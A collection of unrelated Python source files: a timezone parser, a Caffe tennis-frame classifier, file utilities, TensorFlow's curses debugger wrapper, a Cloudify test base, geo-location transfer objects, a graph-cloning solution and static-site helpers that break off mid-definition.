myDB = db.DBConnection("cache.db")
cur_network_list = myDB.select("SELECT * FROM network_timezones")
if cur_network_list is None or len(cur_network_list) < 1:
update_network_dict()
cur_network_list = myDB.select("SELECT * FROM network_timezones")
d = dict(cur_network_list)
except:
d = {}
global network_dict
network_dict = d
# get timezone of a network or return default timezone
def get_network_timezone(network, network_dict):
if network is None:
return sb_timezone
try:
return tz.gettz(network_dict[network])
except:
return sb_timezone
# parse date and time string into local time
def parse_date_time(d, t, network):
if network_dict is None:
load_network_dict()
mo = time_regex.search(t)
if mo is not None and len(mo.groups()) >= 2:
try:
hr = helpers.tryInt(mo.group(1))
m = helpers.tryInt(mo.group(2))
ap = mo.group(3)
# convert am/pm to 24 hour clock
if ap is not None:
if ap.lower() == u" pm" and hr != 12:
hr += 12
elif ap.lower() == u" am" and hr == 12:
hr -= 12
except:
hr = 0
m = 0
else:
hr = 0
m = 0
if hr < 0 or hr > 23 or m < 0 or m > 59:
hr = 0
m = 0
te = datetime.datetime.fromordinal(helpers.tryInt(d))
foreign_timezone = get_network_timezone(network, network_dict)
foreign_naive = datetime.datetime(te.year, te.month, te.day, hr, m, tzinfo=foreign_timezone)
try:
return foreign_naive.astimezone(sb_timezone)
    except ValueError:
return foreign_naive
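# Hedged worked examples for the am/pm handling above (added for illustration):
#
#     "1:30 PM"  -> 13:30    "12:00 PM" -> 12:00 (noon, unchanged)
#     "12:30 AM" -> 00:30    "8:05"     -> 08:05 (no suffix, treated as 24-hour)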
def test_timeformat(t):
mo = time_regex.search(t)
if mo is None or len(mo.groups()) < 2:
return False
else:
return True
|
import numpy as np
import pickle
import cv2
import cv2.cv as cv
import time
import sys
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from sklearn.externals import joblib
caffe_root = '/home/hayden/caffe-recurrent/' # this file is expected to be in {caffe_root}/examples
sys.path.insert(0, caffe_root + 'python')
import caffe
def main():
layers = ['pool5']
vid_path = '/media/hayden/Storage/DATASETS/SPORT/TENNIS01/VID/'
feat_path = '/media/hayden/Storage/DATASETS/SPORT/TENNIS01/FEATURES/VGG16/RAW/'
classifications_path = '/media/hayden/Storage/DATASETS/SPORT/TENNIS01/CLASSIFICATIONS/FC/001/'
classifier_path = '/media/hayden/Storage/DATASETS/SPORT/TENNIS01/MODELS/SVM2/'
video_name = 'AUSO_2014_M_SF_Nadal_Federer'
start = None # if none start from the beginning
end = None # if none end at end of video
fps = 1
    max_frames_in_file = 25000  # keep individual feature files from getting too large
# MODEL_FILE = '/media/hayden/Storage/DATASETS/SPORT/TENNIS01/MODELS/FC/001/VGG_Tennis_deploy.prototxt'
# PRETRAINED = '/media/hayden/Storage/DATASETS/SPORT/TENNIS01/MODELS/FC/001/VGG_Tennis_001_iter_20000.caffemodel'
MODEL_FILE = '/media/hayden/Storage/DATASETS/SPORT/TENNIS01/MODELS/FC/006/deploy.prototxt'
PRETRAINED = '/media/hayden/Storage/DATASETS/SPORT/TENNIS01/MODELS/FC/006/snapshot_iter_65900.caffemodel'
with open('/home/hayden/Desktop/val.txt') as f:
files = f.readlines()
print files[0]
print files[1]
blob = caffe.proto.caffe_pb2.BlobProto()
data = open('/media/hayden/Storage/DATASETS/SPORT/TENNIS01/MODELS/FC/006/mean.binaryproto', 'rb').read()
blob.ParseFromString(data)
arr = np.array(caffe.io.blobproto_to_array(blob))
print arr.shape # check the shape of arr
arr = arr[0]
print arr
print arr.shape
# cv2.imshow('v',arr)
# cv2.waitKey()
caffe.set_mode_gpu() # GPU MODE
net = caffe.Classifier(MODEL_FILE, PRETRAINED, image_dims=(512, 512), mean=arr)
for line in files:
line = line.split()
print line[1]
img = cv2.imread(line[0])
cv2.imshow('word',img)
cv2.waitKey()
#print img
scores = net.predict([img],oversample=False)
print scores
print np.argmax(scores)
print '----'
#
# classify(vid_path, video_name, classifications_path, feat_path, classifier_path, layers, start, end, fps, max_frames_in_file,net)
#######################################################################################################################
def classify(vid_path, video_name, classifications_path, feat_path, classifier_path, layers, start, end, fps, max_frames_in_file,net):
# load net and video to extract features
capture = cv2.VideoCapture(vid_path + video_name)
if start is not None:
capture.set(cv.CV_CAP_PROP_POS_FRAMES, start)
else:
start = 0
if end is None:
end = int(capture.get(cv.CV_CAP_PROP_FRAME_COUNT))
total = end-start
for layer in layers:
start_time = time.clock()
events = ['Nothing','Hit','Serve','Nadal','Federer','Forehand','Backhand']
labels = np.zeros((len(events),total),dtype=np.uint8)
# # load classifier
# classifier_names = ['OTHERvHITvSERVE', 'NADALvFEDERER', 'FOREHANDvBACKHAND']
# classifiers = []
# for classifier_name in classifier_names:
# print 'Loading Classifier: '+classifier_path+classifier_name+'_'+layer+'.pkl'
# classifiers.append(joblib.load(classifier_path+classifier_name+'_'+layer+'.pkl'))
# load features
for current in range(start,end):
if current%max_frames_in_file == 0:
a = current
if (current+max_frames_in_file)>int(capture.get(cv.CV_CAP_PROP_FRAME_COUNT)):
b = int(capture.get(cv.CV_CAP_PROP_FRAME_COUNT))
else:
b = current+max_frames_in_file
print 'Loading features: '+feat_path+video_name+'/'+layer+'_'+str(a)+'_'+str(b-1)
with open(feat_path+video_name+'/'+layer+'_'+str(a)+'_'+str(b-1), 'rb') as f:
features = pickle.load(f)
print '=============='
print current
test_features_in = np.reshape(features[int(current%max_frames_in_file)],(1,1,1,len(features[int(current%max_frames_in_file)])))
print net.predict(test_features_in,oversample=False)
# for c in range(len(classifier_names)):
# predicted_class = classifiers[c].predict([features[int(current%max_frames_in_file)]])[0]
# if c == 0:
# labels[predicted_class][current] = 1
# elif c == 1:
# labels[predicted_class+3][current] = 1
# elif c == 2:
# labels[predicted_class+5][current] = 1
# else:
# pass
if (current/float(total))*100 % 2 == 0:
tr=(total-current)/((1+current)/(time.clock()-start_time))
print 'Perc: %f; Overall Time Remaining: %02d:%02d:%02d;' % ((current/float(total))*100,int((tr/60)/60),int((tr/60)%60),int(tr%60))
# print 'Saving labels: '+classifications_path+video_name+'/'+layer
# with open(classifications_path+video_name+'/'+layer, 'wb') as f:
# pickle.dump(labels, f)
if __name__ == '__main__':
main()
|
"""Common utility functions."""
import os
def get_files(src, search_string):
"""
    Return a list of files.
Parameters
----------
src : str
abs path of directory to search in
search_string : str
search criteria, as in *dat for ls *dat
Returns
-------
files : list
abs path of files found (or empty)
"""
if not src.endswith('/'):
src += '/'
try:
import glob
files = glob.glob1(src, search_string)
except IndexError:
print('Cannot find {0:s} in {1:s}'.format(search_string, src))
import sys
sys.exit(2)
files = [os.path.join(src, f)
for f in files if os.path.isfile(os.path.join(src, f))]
return files
def get_dirs(src, criteria=None):
"""
Return a list of directories in src, optional simple cut by criteria.
Parameters
----------
src : str
abs path of directory to search in
criteria : str
simple if criteria in d to select within directories in src
Returns
-------
dirs : list
abs path of directories found (or empty)
"""
    # Keep only entries that are actually directories, as the docstring promises.
    dirs = [os.path.join(src, l)
            for l in os.listdir(src) if os.path.isdir(os.path.join(src, l))]
if criteria is not None:
dirs = [d for d in dirs if criteria in d]
return dirs
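if __name__ == '__main__':
    # Hedged demo (added for illustration; '/tmp' is just an example path):
    # list *.py files directly under /tmp and any subdirectories of /tmp
    # whose name contains 'tmp'.
    print(get_files('/tmp', '*.py'))
    print(get_dirs('/tmp', criteria='tmp'))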
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Debugger Wrapper Session Consisting of a Local Curses-based CLI."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import shutil
import sys
import tempfile
# Google-internal import(s).
from tensorflow.python.debug.cli import analyzer_cli
from tensorflow.python.debug.cli import cli_shared
from tensorflow.python.debug.cli import debugger_cli_common
from tensorflow.python.debug.cli import stepper_cli
from tensorflow.python.debug.cli import ui_factory
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.wrappers import framework
_DUMP_ROOT_PREFIX = "tfdbg_"
class LocalCLIDebugWrapperSession(framework.BaseDebugWrapperSession):
"""Concrete subclass of BaseDebugWrapperSession implementing a local CLI.
This class has all the methods that a `session.Session` object has, in order
to support debugging with minimal code changes. Invoking its `run()` method
will launch the command-line interface (CLI) of tfdbg.
"""
def __init__(self, sess, dump_root=None, log_usage=True, ui_type="curses"):
"""Constructor of LocalCLIDebugWrapperSession.
Args:
sess: The TensorFlow `Session` object being wrapped.
dump_root: (`str`) optional path to the dump root directory. Must be a
directory that does not exist or an empty directory. If the directory
does not exist, it will be created by the debugger core during debug
`run()` calls and removed afterwards.
log_usage: (`bool`) whether the usage of this class is to be logged.
ui_type: (`str`) requested UI type. Currently supported:
(curses | readline)
Raises:
ValueError: If dump_root is an existing and non-empty directory or if
dump_root is a file.
"""
if log_usage:
pass # No logging for open-source.
framework.BaseDebugWrapperSession.__init__(self, sess)
if dump_root is None:
self._dump_root = tempfile.mktemp(prefix=_DUMP_ROOT_PREFIX)
else:
if os.path.isfile(dump_root):
raise ValueError("dump_root path points to a file: %s" % dump_root)
elif os.path.isdir(dump_root) and os.listdir(dump_root):
raise ValueError("dump_root path points to a non-empty directory: %s" %
dump_root)
self._dump_root = dump_root
self._initialize_argparsers()
# Registered tensor filters.
self._tensor_filters = {}
# Below are the state variables of this wrapper object.
# _active_tensor_filter: what (if any) tensor filter is in effect. If such
# a filter is in effect, this object will call run() method of the
# underlying TensorFlow Session object until the filter passes. This is
# activated by the "-f" flag of the "run" command.
# _run_through_times: keeps track of how many times the wrapper needs to
# run through without stopping at the run-end CLI. It is activated by the
# "-t" option of the "run" command.
# _skip_debug: keeps track of whether the current run should be executed
# without debugging. It is activated by the "-n" option of the "run"
# command.
#
# _run_start_response: keeps track what OnRunStartResponse the wrapper
# should return at the next run-start callback. If this information is
# unavailable (i.e., is None), the run-start CLI will be launched to ask
# the user. This is the case, e.g., right before the first run starts.
self._active_tensor_filter = None
self._run_through_times = 1
self._skip_debug = False
self._run_start_response = None
self._ui_type = ui_type
def _initialize_argparsers(self):
self._argparsers = {}
ap = argparse.ArgumentParser(
description="Run through, with or without debug tensor watching.",
usage=argparse.SUPPRESS)
ap.add_argument(
"-t",
"--times",
dest="times",
type=int,
default=1,
help="How many Session.run() calls to proceed with.")
ap.add_argument(
"-n",
"--no_debug",
dest="no_debug",
action="store_true",
help="Run through without debug tensor watching.")
ap.add_argument(
"-f",
"--till_filter_pass",
dest="till_filter_pass",
type=str,
default="",
help="Run until a tensor in the graph passes the specified filter.")
self._argparsers["run"] = ap
ap = argparse.ArgumentParser(
description="Invoke stepper (cont, step, breakpoint, etc.)",
usage=argparse.SUPPRESS)
self._argparsers["invoke_stepper"] = ap
ap = argparse.ArgumentParser(
description="Display information about this Session.run() call.",
usage=argparse.SUPPRESS)
self._argparsers["run_info"] = ap
def add_tensor_filter(self, filter_name, tensor_filter):
"""Add a tensor filter.
Args:
filter_name: (`str`) name of the filter.
tensor_filter: (`callable`) the filter callable. See the doc string of
`DebugDumpDir.find()` for more details about its signature.
"""
self._tensor_filters[filter_name] = tensor_filter
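  # Hedged illustration (added; not part of the original class): a tensor filter is a
  # predicate, typically over (datum, tensor) as described for DebugDumpDir.find().
  # A wrapped session might register one roughly like this:
  #
  #     def large_values(datum, tensor):
  #         return tensor is not None and (abs(tensor) > 1e6).any()
  #
  #     sess = LocalCLIDebugWrapperSession(tf.Session())
  #     sess.add_tensor_filter("large_values", large_values)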
def on_session_init(self, request):
"""Overrides on-session-init callback.
Args:
request: An instance of `OnSessionInitRequest`.
Returns:
An instance of `OnSessionInitResponse`.
"""
return framework.OnSessionInitResponse(
framework.OnSessionInitAction.PROCEED)
def on_run_start(self, request):
"""Overrides on-run-start callback.
Invoke the CLI to let user choose what action to take:
`run` / `invoke_stepper`.
Args:
      request: An instance of `OnRunStartRequest`.
Returns:
      An instance of `OnRunStartResponse`.
Raises:
RuntimeError: If user chooses to prematurely exit the debugger.
"""
self._update_run_calls_state(request.run_call_count, request.fetches,
request.feed_dict)
if self._active_tensor_filter:
# If we are running till a filter passes, we just need to keep running
# with the DEBUG_RUN option.
return framework.OnRunStartResponse(framework.OnRunStartAction.DEBUG_RUN,
self._get_run_debug_urls())
if self._run_call_count > 1 and not self._skip_debug:
if self._run_through_times > 0:
# Just run through without debugging.
return framework.OnRunStartResponse(
framework.OnRunStartAction.NON_DEBUG_RUN, [])
elif self._run_through_times == 0:
# It is the run at which the run-end CLI will be launched: activate
# debugging.
return framework.OnRunStartResponse(
framework.OnRunStartAction.DEBUG_RUN,
self._get_run_debug_urls())
if self._run_start_response is None:
self._prep_cli_for_run_start()
self._run_start_response = self._launch_cli(is_run_start=True)
if self._run_through_times > 1:
self._run_through_times -= 1
if self._run_start_response == debugger_cli_common.EXPLICIT_USER_EXIT:
# Explicit user "exit" command leads to sys.exit(1).
print(
"Note: user exited from debugger CLI: Calling sys.exit(1).",
file=sys.stderr)
sys.exit(1)
return self._run_start_response
def _prep_cli_for_run_start(self):
"""Prepare (but not launch) the CLI for run-start."""
self._run_cli = ui_factory.get_ui(self._ui_type)
help_intro = debugger_cli_common.RichTextLines([])
if self._run_call_count == 1:
# Show logo at the onset of the first run.
help_intro.extend(cli_shared.get_tfdbg_logo())
help_intro.extend(debugger_cli_common.RichTextLines("Upcoming run:"))
help_intro.extend(self._run_info)
self._run_cli.set_help_intro(help_intro)
# Create initial screen output detailing the run.
self._title = "run-start: " + self._run_description
self._init_command = "run_info"
self._title_color = "blue_on_white"
def on_run_end(self, request):
"""Overrides on-run-end callback.
Actions taken:
1) Load the debug dump.
2) Bring up the Analyzer CLI.
Args:
      request: An instance of OnRunEndRequest.
Returns:
      An instance of OnRunEndResponse.
"""
if request.performed_action == framework.OnRunStartAction.DEBUG_RUN:
partition_graphs = None
if request.run_metadata and request.run_metadata.partition_graphs:
partition_graphs = request.run_metadata.partition_graphs
elif request.client_graph_def:
partition_graphs = [request.client_graph_def]
debug_dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=partition_graphs)
debug_dump.set_python_graph(self._sess.graph)
passed_filter = None
if self._active_tensor_filter:
if not debug_dump.find(
self._tensor_filters[self._active_tensor_filter], first_n=1):
# No dumped tensor passes the filter in this run. Clean up the dump
# directory and move on.
self._remove_dump_root()
return framework.OnRunEndResponse()
else:
# Some dumped tensor(s) from this run passed the filter.
passed_filter = self._active_tensor_filter
self._active_tensor_filter = None
self._prep_cli_for_run_end(debug_dump, request.tf_error, passed_filter)
self._run_start_response = self._launch_cli()
# Clean up the dump generated by this run.
self._remove_dump_root()
else:
# No debug information to show following a non-debug run() call.
self._run_start_response = None
# Return placeholder response that currently holds no additional
# information.
return framework.OnRunEndResponse()
def _remove_dump_root(self):
if os.path.isdir(self._dump_root):
shutil.rmtree(self._dump_root)
def _prep_cli_for_run_end(self, debug_dump, tf_error, passed_filter):
"""Prepare (but not launch) CLI for run-end, with debug dump from the run.
Args:
debug_dump: (debug_data.DebugDumpDir) The debug dump directory from this
run.
tf_error: (None or OpError) OpError that happened during the run() call
(if any).
passed_filter: (None or str) Name of the tensor filter that just passed
and caused the preparation of this run-end CLI (if any).
"""
if tf_error:
help_intro = cli_shared.get_error_intro(tf_error)
self._init_command = "help"
self._title_color = "red_on_white"
else:
help_intro = None
self._init_command = "lt"
self._title_color = "black_on_white"
if passed_filter is not None:
# Some dumped tensor(s) from this run passed the filter.
self._init_command = "lt -f %s" % passed_filter
self._title_color = "red_on_white"
self._run_cli = analyzer_cli.create_analyzer_ui(
debug_dump, self._tensor_filters, ui_type=self._ui_type)
# Get names of all dumped tensors.
dumped_tensor_names = []
for datum in debug_dump.dumped_tensor_data:
dumped_tensor_names.append("%s:%d" %
(datum.node_name, datum.output_slot))
# Tab completions for command "print_tensors".
self._run_cli.register_tab_comp_context(["print_tensor", "pt"],
dumped_tensor_names)
# Tab completion for commands "node_info", "list_inputs" and
# "list_outputs". The list comprehension is used below because nodes()
# output can be unicodes and they need to be converted to strs.
self._run_cli.register_tab_comp_context(
["node_info", "ni", "list_inputs", "li", "list_outputs", "lo"],
[str(node_name) for node_name in debug_dump.nodes()])
# TODO(cais): Reduce API surface area for aliases vis-a-vis tab
# completion contexts and registered command handlers.
self._title = "run-end: " + self._run_description
if help_intro:
self._run_cli.set_help_intro(help_intro)
def _launch_cli(self, is_run_start=False):
"""Launch the interactive command-line interface.
Args:
is_run_start: (bool) whether this CLI launch occurs at a run-start
callback.
Returns:
The OnRunStartResponse specified by the user using the "run" command.
"""
self._register_this_run_info(self._run_cli)
response = self._run_cli.run_ui(
init_command=self._init_command,
title=self._title,
title_color=self._title_color)
return response
def _run_info_handler(self, args, screen_info=None):
output = self._run_info
# Add main menu.
menu = debugger_cli_common.Menu()
menu.append(debugger_cli_common.MenuItem("list_tensors", "lt"))
menu.append(debugger_cli_common.MenuItem("help", "help"))
output.annotations[debugger_cli_common.MAIN_MENU_KEY] = menu
return output
def _run_handler(self, args, screen_info=None):
"""Command handler for "run" command during on-run-start."""
_ = screen_info # Currently unused.
parsed = self._argparsers["run"].parse_args(args)
if parsed.till_filter_pass:
# For the run-till-bad-numerical-value-appears mode, use the DEBUG_RUN
# option to access the intermediate tensors, and set the corresponding
# state flag of the class itself to True.
if parsed.till_filter_pass in self._tensor_filters:
action = framework.OnRunStartAction.DEBUG_RUN
self._active_tensor_filter = parsed.till_filter_pass
else:
# Handle invalid filter name.
return debugger_cli_common.RichTextLines(
["ERROR: tensor filter \"%s\" does not exist." %
parsed.till_filter_pass])
self._skip_debug = parsed.no_debug
self._run_through_times = parsed.times
if parsed.times > 1 or parsed.no_debug:
# If requested -t times > 1, the very next run will be a non-debug run.
action = framework.OnRunStartAction.NON_DEBUG_RUN
debug_urls = []
else:
action = framework.OnRunStartAction.DEBUG_RUN
debug_urls = self._get_run_debug_urls()
# Raise CommandLineExit exception to cause the CLI to exit.
raise debugger_cli_common.CommandLineExit(
exit_token=framework.OnRunStartResponse(action, debug_urls))
def _register_this_run_info(self, curses_cli):
curses_cli.register_command_handler(
"run",
self._run_handler,
self._argparsers["run"].format_help(),
prefix_aliases=["r"])
curses_cli.register_command_handler(
"invoke_stepper",
self._on_run_start_step_handler,
self._argparsers["invoke_stepper"].format_help(),
prefix_aliases=["s"])
curses_cli.register_command_handler(
"run_info",
self._run_info_handler,
self._argparsers["run_info"].format_help(),
prefix_aliases=["ri"])
if self._tensor_filters:
# Register tab completion for the filter names.
curses_cli.register_tab_comp_context(["run", "r"],
list(self._tensor_filters.keys()))
def _on_run_start_step_handler(self, args, screen_info=None):
"""Command handler for "invoke_stepper" command during on-run-start."""
_ = screen_info # Currently unused.
# No parsing is currently necessary for invoke_stepper. This may change
# in the future when the command has arguments.
# Raise CommandLineExit exception to cause the CLI to exit.
raise debugger_cli_common.CommandLineExit(
exit_token=framework.OnRunStartResponse(
framework.OnRunStartAction.INVOKE_STEPPER, []))
def _get_run_debug_urls(self):
"""Get the debug_urls value for the current run() call.
Returns:
debug_urls: (list of str) Debug URLs for the current run() call.
Currently, the list consists of only one URL that is a file:// URL.
"""
return ["file://" + self._dump_root]
def _update_run_calls_state(self, run_call_count, fetches, feed_dict):
"""Update the internal state with regard to run() call history.
Args:
run_call_count: (int) Number of run() calls that have occurred.
fetches: a node/tensor or a list of node/tensor that are the fetches of
the run() call. This is the same as the fetches argument to the run()
call.
feed_dict: None or a dict. This is the feed_dict argument to the run()
call.
"""
self._run_call_count = run_call_count
self._run_description = cli_shared.get_run_short_description(run_call_count,
fetches,
feed_dict)
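# Count down the remaining run() calls requested via "run -t N"; run-start
# debugging is presumably skipped until this counter reaches zero.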
self._run_through_times -= 1
self._run_info = cli_shared.get_run_start_intro(run_call_count,
fetches,
feed_dict,
self._tensor_filters)
def invoke_node_stepper(self,
node_stepper,
restore_variable_values_on_exit=True):
"""Overrides method in base class to implement interactive node stepper.
Args:
node_stepper: (`stepper.NodeStepper`) The underlying NodeStepper API
object.
restore_variable_values_on_exit: (`bool`) Whether any variables whose
values have been altered during this node-stepper invocation should be
restored to their old values when this invocation ends.
Returns:
The same return values as the `Session.run()` call on the same fetches as
the NodeStepper.
"""
stepper = stepper_cli.NodeStepperCLI(node_stepper)
# On exiting the node-stepper CLI, the finalize method of the node_stepper
# object will be called, ensuring that the state of the graph will be the
# same as if the stepping did not happen.
# TODO(cais): Perhaps some users will want the effect of the interactive
# stepping and value injection to persist. When that happens, make the call
# to finalize optional.
stepper_ui = ui_factory.get_ui(
self._ui_type,
on_ui_exit=(node_stepper.restore_variable_values if
restore_variable_values_on_exit else None))
stepper_ui.register_command_handler(
"list_sorted_nodes",
stepper.list_sorted_nodes,
stepper.arg_parsers["list_sorted_nodes"].format_help(),
prefix_aliases=["lt", "lsn"])
stepper_ui.register_command_handler(
"cont",
stepper.cont,
stepper.arg_parsers["cont"].format_help(),
prefix_aliases=["ct", "c"])
stepper_ui.register_command_handler(
"step",
stepper.step,
stepper.arg_parsers["step"].format_help(),
prefix_aliases=["st", "s"])
stepper_ui.register_command_handler(
"print_tensor",
stepper.print_tensor,
stepper.arg_parsers["print_tensor"].format_help(),
prefix_aliases=["pt"])
stepper_ui.register_command_handler(
"inject_value",
stepper.inject_value,
stepper.arg_parsers["inject_value"].format_help(),
prefix_aliases=["inject", "override_value", "override"])
# Register tab completion candidates.
stepper_ui.register_tab_comp_context([
"cont", "ct", "c", "pt", "inject_value", "inject", "override_value",
"override"
], [str(elem) for elem in node_stepper.sorted_nodes()])
# TODO(cais): Tie up register_tab_comp_context to a single alias to shorten
# calls like this.
return stepper_ui.run_ui(
init_command="lt",
title="Node Stepper: " + self._run_description,
title_color="blue_on_white")
|
#########
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import tempfile
import os
import shutil
from manager_rest.test.base_test import BaseServerTestCase
from wagon.wagon import Wagon
class BaseListTest(BaseServerTestCase):
def _put_deployment_modification(self, deployment_id,
modified_nodes=None,
node_instances=None,
nodes=None):
resource_path = '/deployment-modifications'
data = {'deployment_id': deployment_id,
'modified_nodes': modified_nodes or {},
'node_instances': node_instances or {},
'nodes': nodes or {}}
return self.post(resource_path, data).json
def _mark_deployment_modification_finished(self, modification_id=None):
resource_path = '/deployment-modifications/{0}/finish'.format(
modification_id)
data = {'modification_id': modification_id}
return self.post(resource_path, data).json
def _put_n_deployment_modifications(self, id_prefix,
number_of_modifications,
skip_creation=None):
self._put_n_deployments(id_prefix,
number_of_modifications,
skip_creation=skip_creation,
add_modification=True)
def _put_n_plugins(self, number_of_plugins):
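# Build a throwaway wagon archive for each plugin and upload it through the
# /plugins endpoint, removing the temporary build directory afterwards.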
for i in range(0, number_of_plugins):
tmpdir = tempfile.mkdtemp(prefix='test-pagination-')
with open(os.path.join(tmpdir, 'setup.py'), 'w') as f:
f.write('from setuptools import setup\n')
f.write('setup(name="some-package", version={0})'.format(i))
wagon = Wagon(tmpdir)
plugin_path = wagon.create(archive_destination_dir=tmpdir)
self.post_file('/plugins', plugin_path)
shutil.rmtree(tmpdir)
def _put_n_deployments(self, id_prefix,
number_of_deployments,
skip_creation=None,
add_modification=None):
for i in range(0, number_of_deployments):
deployment_id = "{0}{1}_{2}".format(id_prefix, str(i),
'deployment')
blueprint_id = "{0}{1}_{2}".format(id_prefix, str(i), 'blueprint')
if not skip_creation:
self.put_deployment(deployment_id=deployment_id,
blueprint_id=blueprint_id)
if add_modification:
response = self._put_deployment_modification(
deployment_id=deployment_id)
self._mark_deployment_modification_finished(
modification_id=response['id'])
def _put_n_snapshots(self, number_of_snapshots):
for i in range(number_of_snapshots):
self.client.snapshots.create(snapshot_id='oh-snap{0}'.format(i),
include_metrics=False,
include_credentials=False)
|
# -*- coding: utf-8 -*-
# Copyright 2020 Green Valley Belgium NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.7@@
from google.appengine.ext import db
from mcfw.properties import long_property, typed_property, unicode_property
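# Latitude/longitude are transported as integers in micro-degrees; divide by
# this factor to recover degrees (see latitude_degrees/longitude_degrees).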
GEO_POINT_FACTOR = 1000000.0
class GeoPointTO(object):
latitude = long_property('1')
longitude = long_property('2')
accuracy = long_property('3')
@property
def latitude_degrees(self):
return self.latitude / GEO_POINT_FACTOR
@property
def longitude_degrees(self):
return self.longitude / GEO_POINT_FACTOR
def toGeoPoint(self):
return db.GeoPt(self.latitude / GEO_POINT_FACTOR, self.longitude / GEO_POINT_FACTOR)
@staticmethod
def fromGeoPoint(geoPoint):
to = GeoPointTO()
to.latitude = int(geoPoint.lat * GEO_POINT_FACTOR)
to.longitude = int(geoPoint.lon * GEO_POINT_FACTOR)
return to
@staticmethod
def fromLocation(location):
to = GeoPointTO.fromGeoPoint(location.geoPoint)
to.accuracy = location.geoAccuracy
return to
class GeoPointWithTimestampTO(GeoPointTO):
timestamp = long_property('100')
@staticmethod
def fromLocation(location):
to = GeoPointWithTimestampTO()
to.latitude = int(location.geoPoint.lat * GEO_POINT_FACTOR)
to.longitude = int(location.geoPoint.lon * GEO_POINT_FACTOR)
to.accuracy = location.accuracy
to.timestamp = location.timestamp
return to
class CellTowerTO(object):
cid = long_property('1')
strength = long_property('2')
class RawLocationInfoTO(object):
cid = long_property('1')
lac = long_property('2')
net = long_property('3')
mobileDataType = long_property('5')
signalStrength = long_property('6')
class CallRecordTO(object):
id = long_property('1')
phoneNumber = unicode_property('2')
duration = long_property('3')
type = long_property('4')
starttime = long_property('5')
countrycode = unicode_property('6')
geoPoint = typed_property('7', GeoPointTO, False)
rawLocation = typed_property('8', RawLocationInfoTO, False)
class LocationRecordTO(object):
timestamp = long_property('1')
geoPoint = typed_property('2', GeoPointTO, False)
rawLocation = typed_property('3', RawLocationInfoTO, False)
class LogCallRequestTO(object):
record = typed_property('1', CallRecordTO, False)
class LogCallResponseTO(object):
recordId = long_property('1')
class LogLocationRecipientTO(object):
friend = unicode_property('1')
target = long_property('2')
class LogLocationsRequestTO(object):
records = typed_property('1', LocationRecordTO, True)
recipients = typed_property('2', LogLocationRecipientTO, True)
class LogLocationsResponseTO(object):
pass
class ReportObjectionableContentRequestTO(object):
TYPE_NEWS = u'news'
type = unicode_property('1')
object = unicode_property('2')
reason = unicode_property('3')
class ReportObjectionableContentResponseTO(object):
pass
|
# Definition for an undirected graph node
# class UndirectedGraphNode(object):
# def __init__(self, x):
# self.label = x
# self.neighbors = []
class Solution(object):
# def __init__(self):
# self.label_map = {}
# def cloneGraph(self, node):
# """
# :type node: UndirectedGraphNode
# :rtype: UndirectedGraphNode
# """
# # DFS
# if node is None:
# return None
# res = UndirectedGraphNode(node.label)
# self.label_map[node.label] = res
# for ne in node.neighbors:
# if ne.label not in self.label_map:
# res.neighbors.append(self.cloneGraph(ne))
# else:
# res.neighbors.append(self.label_map[ne.label])
# return res
def cloneGraph(self, node):
# BFS
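# label_map maps each original node label to its copy; a node is copied the
# first time it is seen, and its neighbor links are wired up when the original
# node is dequeued.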
if node is None:
return None
label_map = {}
queue = [node]
graphCopy = UndirectedGraphNode(node.label)
label_map[node.label] = graphCopy
while len(queue) > 0:
curr = queue.pop(0)
for ne in curr.neighbors:
if ne.label in label_map:
label_map[curr.label].neighbors.append(label_map[ne.label])
else:
neighborCopy = UndirectedGraphNode(ne.label)
label_map[curr.label].neighbors.append(neighborCopy)
label_map[ne.label] = neighborCopy
queue.append(ne)
return graphCopy
|
import os
import re
import subprocess
from urllib.parse import urljoin
from tornado.util import ObjectDict
from catsup.logger import logger
HTML_TAG_RE = re.compile("<.*?>")
def html_to_raw_text(html):
return "".join(HTML_TAG_RE.split(html))
def static_url(f):
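# Resolve a theme-static file to a URL with an md5 content hash appended as a
# cache-busting query string; results are memoized in g.generator.caches.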
from catsup.options import g
caches_class = g.generator.caches["static_url"]
if f not in caches_class:
import os
import hashlib
def get_hash(path):
path = os.path.join(g.theme.path, "static", path)
if not os.path.exists(path):
logger.warn("%s does not exist." % path)
return
with open(path, "rb") as f:
return hashlib.md5(f.read()).hexdigest()
hsh = get_hash(f)
url = urljoin(g.static_prefix, "%s?v=%s" % (f, hsh))
caches_class[f] = url
return caches_class[f]
def url_for(obj):
from catsup.options import g
caches_class = g.generator.caches["url_for"]
key = id(obj)
if key not in caches_class:
from catsup.models import CatsupPage
url = ""
if obj == "index":
url = g.base_url
elif isinstance(obj, CatsupPage):
url = obj.permalink
elif isinstance(obj, str):
url = g.permalink[obj]
caches_class[key] = urljoin(g.base_url, url)
return caches_class[key]
def to_unicode(value):
if isinstance(value, str):
return value
if isinstance(value, int):
return str(value)
if isinstance(value, bytes):
return value.decode("utf-8")
return value
def update_nested_dict(a, b):
for k, v in b.items():
if isinstance(v, dict):
d = a.setdefault(k, ObjectDict())
update_nested_dict(d, v)
else:
a[k] = v
return a
def call(cmd, silence=True, **kwargs):
